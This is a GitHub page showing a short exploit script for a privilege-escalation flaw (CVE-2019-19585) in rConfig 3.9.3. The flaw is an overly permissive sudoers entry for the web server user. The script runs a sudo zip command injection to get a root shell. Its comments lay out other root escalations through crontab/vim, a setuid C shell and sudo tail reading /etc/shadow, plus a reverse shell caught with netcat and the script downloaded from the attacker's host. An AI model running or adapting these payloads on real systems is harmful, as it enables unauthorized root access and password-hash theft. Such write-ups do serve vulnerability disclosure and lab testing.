Permalink
Cannot retrieve contributors at this time
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
exploits-rconfig/rconfig_lpe.sh
Go to fileThis commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
110 lines (104 sloc)
3.92 KB
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Exploit Title: rConfig <= v3.9.3 - Privilege Escalation | |
| # Date: 07/11/2019 | |
| # CVE-2019-19585 | |
| # Exploit Author: vikingfr | |
| # Vendor Homepage: https://rconfig.com/ (see also : https://github.com/rconfig/rconfig) | |
| # Software Link : http://files.rconfig.com/downloads/scripts/centos7_install.sh | |
| # Version: tested v3.9.3 | |
| # Tested on: CentOS 7.7 | |
| # | |
| # Notes : If you want to reproduce in your lab environment follow those links : | |
| # http://help.rconfig.com/gettingstarted/installation | |
| # then | |
| # http://help.rconfig.com/gettingstarted/postinstall | |
| # | |
| # Reading the "rConfig 3.x Installation Instructions" (http://help.rconfig.com/gettingstarted/installation), we can notice 2 install scripts are used : | |
| # $ curl -O http://files.rconfig.com/downloads/scripts/install_rConfig.sh -A "Mozilla" | |
| # $ grep curl install_rConfig.sh | |
| # curl -O http://files.rconfig.com/downloads/scripts/centos7_install.sh -A "Mozilla" >> $LOGFILE 2>&1 | |
| # curl -O http://files.rconfig.com/downloads/scripts/centos6_install.sh -A "Mozilla" >> $LOGFILE 2>&1 | |
| # | |
| # Looking at the install scripts, we see that Apache is sudoer. | |
| # $ sed -n 131,148p centos7_install.sh | |
| # #SUDOERs Update | |
| # SUDOINSTALLMSG="Updating Sudoers File..." | |
| # echo $SUDOINSTALLMSG; | |
| # echo -ne '##### (33%\r)' | |
| # sleep 1 | |
| # echo -ne '############# (66%)\r' | |
| # sleep 1 | |
| # echo -ne '##########################(100%)\n' | |
| # echo "<<<< Start - $SUDOINSTALLMSG >>>>" >> $LOGFILE 2>&1 | |
| # # update sudoers for rconfig specific tasks | |
| # echo '### rConfig specific Apahce configuration' >> /etc/sudoers | |
| # echo 'apache ALL = (ALL) NOPASSWD: /usr/bin/crontab, /usr/bin/zip, /bin/chmod, /bin/chown, /usr/bin/whoami, /usr/bin/wc, /usr/bin/tail, /bin/rm' >> /etc/sudoers | |
| # echo 'Defaults:apache !requiretty' >> /etc/sudoers | |
| # cat /etc/sudoers >> $LOGFILE 2>&1 | |
| # echo -e "${green}Status: Sudoers Updated${reset}\n"; | |
| # echo "<<<< End - $SUDOINSTALLMSG >>>>" >> $LOGFILE 2>&1 | |
| # | |
| # So if an attacker got a web RCE / Apache shell access, privilege escalation can be done with multiples techniques. | |
| # | |
| # Example | |
| # $ python3 rconfig_CVE-2019-19509.py https://192.168.43.34 admin root 192.168.43.245 8081 | |
| # rconfig - CVE-2019-19509 - Web authenticated RCE | |
| # [+] Logged in successfully, triggering the payload... | |
| # [+] Check your listener ! | |
| # | |
| # $ nc -nvlp 8081 | |
| # listening on [any] 8081 ... | |
| # connect to [192.168.43.245] from (UNKNOWN) [192.168.43.34] 34470 | |
| # bash: no job control in this shell | |
| # bash-4.2$ | |
| # | |
| # bash-4.2$ wget http://192.168.43.245:8000/rconfig_lpe.sh | |
| # wget http://192.168.43.245:8000/rconfig_lpe.sh | |
| # bash-4.2$ chmod 700 rconfig_lpe.sh | |
| # bash-4.2$ ./rconfig_lpe.sh | |
| # | |
| # ./rconfig_lpe.sh | |
| # rConfig v3.9.3 - Privilege Escalation | |
| # id | |
| # uid=0(root) gid=0(root) groups=0(root) | |
| ########################### | |
| # LPE using crontab (ex : using vim) | |
| ########################### | |
| # bash-4.2$ sudo crontab -e | |
| # sudo crontab -e | |
| # ... | |
| # :set shell=/bin/sh | |
| # :shell | |
| # id | |
| # uid=0(root) gid=0(root) groups=0(root) | |
| ########################### | |
| # LPE using ZIP | |
| ########################### | |
| # bash-4.2$ touch /tmp/LPE.txt | |
| # bash-4.2$ sudo zip -q /tmp/LPE.zip /tmp/LPE.txt -T -TT '/bin/sh #' | |
| # id | |
| # uid=0(root) gid=0(root) groups=0(root) | |
| echo "rConfig v3.9.3 - Privilege Escalation" | |
| touch /tmp/LPE.txt | |
| sudo zip -q /tmp/LPE.zip /tmp/LPE.txt -T -TT '/bin/sh #' | |
| ########################### | |
| # LPE using chmod / chown | |
| ########################### | |
| # bash-4.2$ cd /tmp | |
| # bash-4.2$ echo 'int main() { setresuid(0,0,0); system("/bin/sh"); }' > privshell.c | |
| # bash-4.2$ gcc -o privshell privshell.c | |
| # bash-4.2$ rm privshell.c | |
| # bash-4.2$ sudo chown root:root /tmp/privshell | |
| # bash-4.2$ sudo chmod u+s /tmp/privshell | |
| # bash-4.2$ ./privshell | |
| # id | |
| # uid=0(root) gid=48(apache) groups=48(apache) | |
| ########################### | |
| # FILE READ using TAIL | |
| ########################### | |
| #bash-4.2$ sudo tail -22 /etc/shadow | |
| #sudo tail -22 /etc/shadow | |
| #root:$6$Jhxxxxxxxxxxxxxxxxxxx8/:18208:0:99999:7::: | |
| #bin:*:17834:0:99999:7::: | |
| #daemon:*:17834:0:99999:7::: | |
| # ... | |
| # EOF | |